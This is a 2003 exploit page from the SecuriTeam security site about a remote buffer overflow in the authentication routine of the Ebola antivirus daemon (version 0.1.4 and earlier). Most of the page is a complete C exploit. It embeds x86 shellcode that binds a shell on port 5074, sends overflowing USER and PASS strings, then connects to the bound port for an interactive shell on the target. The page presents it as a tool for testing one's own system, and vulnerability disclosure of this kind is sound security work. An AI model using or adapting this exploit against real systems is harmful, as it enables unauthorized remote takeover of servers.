Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key). CanSecWest 2012 2nd Annual Cyber Security Hack In Paris	Ebola Username and Password Remote Exploit 11 Dec. 2003    Summary Ebola is a AntiVirus scanning daemon system which offers to improve considerably the performance of scanning systems such as AMaViS, Inflex and other such programs which require on demand scanning from various AV engines. The Ebola daemon contains a remotely exploitable buffer overflow in its authentication sequence. The following is an exploit code that can be used to test your system for the mentioned vulnerability.   Credit: The information has been provided by c0wboy. Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Vulnerable systems:  * Ebola version 0.1.5 Vulnerable systems:  * Ebola version 0.1.4 and prior Exploit: /* 0x333ebola.c => ebola 0.1.4 remote exploit  *  * [-3-] __ OUTSIDERS VIRTUAL SECURITY LABS __ [-3-]  *  * Ebola 0.1.4 remote stack overflow exploit,  * bug found by "Secure Network Operations".  *  * Here the bugged code :  *  * [...]  * int handle_PASS( int ssocket, char *sentline ){  *  * char *passwd;  * char outstr[100];  *  * [...]  * else {  * sprintf(outstr,"PASS NOT ACCEPTED for user \"%s\", pass \"%s\".\n",username,passwd);  * write(ssocket,outstr,strlen(outstr));  * sleep(_BAD_PASS_SLEEP_TIME);  * }  * [...]  *  * Technical details :  *  * - system : Red Hat Linux 8.0  * - package : ebola-0.1.4.tar.gz (from : http://pldaniels.com/ebola/)  * - requires : libsavi (libsavi.so.3.2.07.031) (from http://www.sophos.com)  *  * Note : the exploit is unstable.  *  * coded by c0wboy  *  * (c) 0x333 Outsider Security Labs 2003 / www.0x333.org  *  */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <netdb.h> #define EBOLA 1665 #define SHELL 5074 #define MAX_TG 2 int fdsocket, debug = 0x0; struct sockaddr_in anger; struct hostent * cya; struct {   char *os; /* system os */   char *descpr; /* ebola infos */   int ret; /* return address */   int align; /* align the buffer */ } ebola[] = {   { "RedHat 8.0 (Psyche)", "ebola-0.1.4.tar.gz", 0xbfffea1c, 3 },   { "Generic Linux Test ", "generic ebola!", 0x41414141, 0x0 },   { "exploit code", "outsiders security labs", 0x333, 0x333 }, }; unsigned char shellcode_1[] =   "\x90\x90\x90\x90\x31\xc0\x50\x40\x89\xc3\x50\x40\x50"   "\x89\xe1\xb0\x66\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2"   "\x43\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66"   "\xcd\x80\x40\x89\x44\x24\x04\x43\x43\xb0\x66\xcd\x80"   "\x83\xc4\x0c\x52\x52\x43\xb0\x66\xcd\x80\x93\x89\xd1"   "\xb0\x3f\xcd\x80\xeb\x36"; unsigned char shellcode_2[] =   "\x90\x90\x90\x90\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e"   "\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89"   "\xe1\xb0\x0b\xcd\x80"; void list(void); void banner(void); void usage(char *); void warning(char *); int ebol4(char *, int, int, int); int connection(char *, int); int owned(int); void list (void) {   int i;   fprintf (stderr, "\n _(0x0)_ targets _(0x0)_\n");   fprintf (stderr, " ----------------------- \n");   for (i=0; ebola[i].ret != 0x333; i++)     fprintf (stderr, " _(%d)_ %s [%s]\n", i, ebola[i].os, ebola[i].descpr);   fprintf (stderr, "\n");   exit(EXIT_FAILURE); } void banner (void) {   fprintf (stdout, "\n --- 0x333ebola => ebola-0.1.4 remote exploit ---\n");   fprintf (stdout, " --- Outsiders Se(c)urity Labs 2003 ---\n\n"); } void usage (char *prg) {   banner();   fprintf (stderr, " Usage : %s [-d hostname] [-p port] [-t target] [-l] [-V] [-h]\n\n", prg);   fprintf (stderr, "\t-d :\thost to attack\n");   fprintf (stderr, "\t-p :\tebola's port (default %d)\n", EBOLA);   fprintf (stderr, "\t-t :\tselect a target\n");   fprintf (stderr, "\t-l :\tlist targets\n");   fprintf (stderr, "\t-V :\tdebug mode\n");   fprintf (stderr, "\t-h :\tdisplay this help\n\n");     exit (EXIT_FAILURE); } void warning (char *error) {   fprintf (stderr, "%s", error);   close (fdsocket);   exit (EXIT_FAILURE); } int ebol4 (char *target, int port, int ret, int align) {   int i;   char snd[1024]="", rcv[1024]="";   char buf1[92], buf2[101];   int *ebol = (int *)(buf2 + align);   if (connection(target, port)) /* connect to server */     warning ("\n _(0x666)_ Error in connecting to server\n");   else     fprintf (stdout, " _(0x1)_ Connected (!)\n");   /* create buffer */   memset ((char *)buf1, 0x90, sizeof(buf1));   memcpy ((char *)buf1, shellcode_1, strlen(shellcode_1));   memset ((char *)buf2, 0x90, sizeof(buf2));   for (i=0; i<15; i+=4, *ebol++ = ret);   memcpy ((char *)buf2+15+12, shellcode_2, strlen(shellcode_2));   recv (fdsocket, rcv, sizeof(rcv), 0x0);   if (debug)     fprintf (stdout, "\n <debug> server resp. : %s\n", rcv);   fprintf (stdout, " _(0x2)_ Sending USER (shellcode_1)\n");   sprintf (snd, "USER %s\n", buf1);   write (fdsocket, snd, strlen(snd));   recv (fdsocket, rcv, sizeof(rcv), 0x0);   if (debug)   {     fprintf (stdout, " <debug> [w8ing ...] run gdb then press [ENTER]\n");     getchar();   }   fprintf (stdout, " _(0x3)_ Sending PASS (shellcode_2)\n\n");   sprintf (snd, "PASS %s\n", buf2);   write (fdsocket, snd, strlen(snd));   recv (fdsocket, rcv, sizeof(rcv), 0x0);   if (debug)     fprintf (stdout, " <debug> server resp. : %s\n", rcv);   close (fdsocket);   if (!(connection(target, SHELL)))     owned(fdsocket);   else     return 0x666;   return 0x333; } int connection (char *target, int port) {   anger.sin_family = AF_INET;   anger.sin_port = htons(port);   cya = gethostbyname(target);   if (cya==0x0)     return 0x1;   else   {     bcopy (cya->h_addr, &anger.sin_addr, cya->h_length);     if ((fdsocket = socket (AF_INET, SOCK_STREAM, 0x0)) < 0x0)       return 0x1;     else       if ((connect (fdsocket, (struct sockaddr*)&anger, sizeof(anger))) < 0x0)         return 0x1;   }   return 0x0; } int owned (int fdsocket) {   int i;   fd_set hate;   char outside[1024];   char *cmd="uname -a;id;\n\n";   FD_ZERO (&hate);   FD_SET (fdsocket, &hate);   FD_SET (0, &hate);   fprintf (stdout, " (======owned======) (======owned======) (======owned======)\n\n");   send (fdsocket, cmd, strlen(cmd), 0x0);   for(;;)   {     FD_SET (fdsocket, &hate);     FD_SET (0, &hate);     if (select(FD_SETSIZE, &hate, NULL, NULL, NULL) < 0x0)       break;     if (FD_ISSET(fdsocket, &hate))     {       if ((i = recv(fdsocket, outside, sizeof(outside)-1, 0x0)) < 0x0)         warning (" _(0x333)_ cya hax0r\n");       if (write(1, outside, i) < 0x0)         break;     }     if (FD_ISSET(0x0, &hate))     {       if ((i = read(0x0, outside, sizeof (outside)-1)) < 0x0)         warning(" _(0x333)_ cya hax0r\n");       if (send(fdsocket, outside, i, 0x0) < 0x0)         break;     }     usleep(10);   }   fprintf (stderr, " _(0x333)_ cya hax0r\n");   return 0; } int main (int argc, char **argv) {   int c, i = -1, port = EBOLA;   char *target =NULL;      while ((c = getopt(argc, argv, "hVlt:d:p:")) != EOF)   {     switch (c)     {       case 'p' : port = atoi(optarg); break;       case 'd' : target = optarg; break;       case 't' :            i = atoi(optarg);            if (i<0 || i>MAX_TG-1)              usage(argv[0]);            break;       case 'l' : list(); break;       case 'V' : debug = 0x1; break;       case 'h' :       default : usage(argv[0]);     }   }   if (target == NULL || i == -1)     usage(argv[0]);   banner();   fprintf (stdout, " _(0x0)_ Exploiting <%s:%d> on %s\n", target, port, ebola[i].os);      if ((ebol4(target, port, ebola[i].ret, ebola[i].align)) == 0x333)     return 0;   else     warning ("\n _(0x666)_ Exploitation Failed !\n\n"); }  Comments: blog comments powered by Disqus	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Microsoft Windows shmedia.dll Division By Zero, Explore.exe DOS Exploit IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS Progea Movicon TCPUploadServer Remote Exploit Trango Broadband Wireless Rogue SU Authentication Bug Exposing HMS HICP Protocol and Intellicom NetBiterConfig.exe Remote Buffer Overflow Family Connections Multiple Remote Vulnerabilities VideoCache vccleaner Root Vulnerability QuickHeal Antivirus 2010 Local Privilege Escalation DubSite CMS Cross Site Request Forgery Vulnerability SonicWall Global Management System XSS Vulnerability Sonicwall NSA E7500 XSS Vulnerability Juniper Security Threat Response Manager XSS Vulnerability Hacking CSRF Tokens using CSS History Hack Sun Java System Identiy Manager Users Enumeration Microsoft Internet Explorer XML Buffer Overflow (Exploit)  Featured Articles ProFTPD Response Pool Use-After-Free Code Execution Vulnerability HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Adobe Reader U3D IFF RGBA Parsing Code Execution Vulnerability Adobe Reader U3D PCX Parsing Code Execution Vulnerability Cisco Unified Service Monitor brstart add_dm Code Execution Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2011 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®